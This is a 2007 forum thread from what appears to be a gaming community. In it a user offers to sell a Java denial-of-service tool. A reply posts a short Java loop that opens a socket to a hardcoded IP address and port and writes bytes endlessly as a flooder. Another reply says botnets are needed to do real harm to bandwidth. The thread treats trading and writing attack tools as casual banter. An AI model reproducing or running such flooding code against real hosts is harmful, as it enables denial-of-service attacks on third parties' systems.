Adblock breaks this site

Selling a Java DoSer with a form.

Discussion in 'Programming General' started by Inching Away, Aug 19, 2007.

  1. Inching Away

    Inching Away Active Member

    Joined:
    Aug 3, 2007
    Posts:
    249
    Referrals:
    1
    Sythe Gold:
    0
    Selling a Java DoSer with a form.

    Selling a Java DoSer in RSGP. I can use an MM but a official one at that. It has an input form to make it easy to use. Add me on MSN to discuss it. [email protected]

    It starts a Connection using WinSock Controls than continuously writes Bytes to the stream, having the same effect as pinging for ever with a spoofed IP.
     
  2. speljohan

    speljohan Guru
    Visual Basic Programmers

    Joined:
    Apr 24, 2005
    Posts:
    1,450
    Referrals:
    3
    Sythe Gold:
    0
    Selling a Java DoSer with a form.

    Code:
    Socket s = new Socket("65.3.71.83", 5352);
    DataOutputStream dos = new DataOutputStream(s.getOutputStream());
    while(true) {
    dos.writeBytes("zomghax");
    }
    There you go ;)

    And no, you aren't using WinSock, and you aren't using "Controls". That's not java.
     
  3. Swan

    Swan When They Cry...
    Retired Global Moderator

    Joined:
    Jan 23, 2007
    Posts:
    4,957
    Referrals:
    0
    Sythe Gold:
    0
    Sythe's 10th Anniversary Member of the Month Winner
    Selling a Java DoSer with a form.

    single client DDoSers are pointless anyway. You either need to have a lot of volunteers or a botnet if you wanna do any real harm to their bandwidth lol.
     
  4. Olan14

    Olan14 Forum Addict

    Joined:
    Jan 26, 2007
    Posts:
    581
    Referrals:
    0
    Sythe Gold:
    0
    Selling a Java DoSer with a form.

    You Fucker!! Inching I Fucking Hate You. Selling Something I Made! I'm The One Who Described It Like That! Omfgg
     
< What file does Runescape rely on to... | need help plase any one? ill vouch you big time! >


 
 
Adblock breaks this site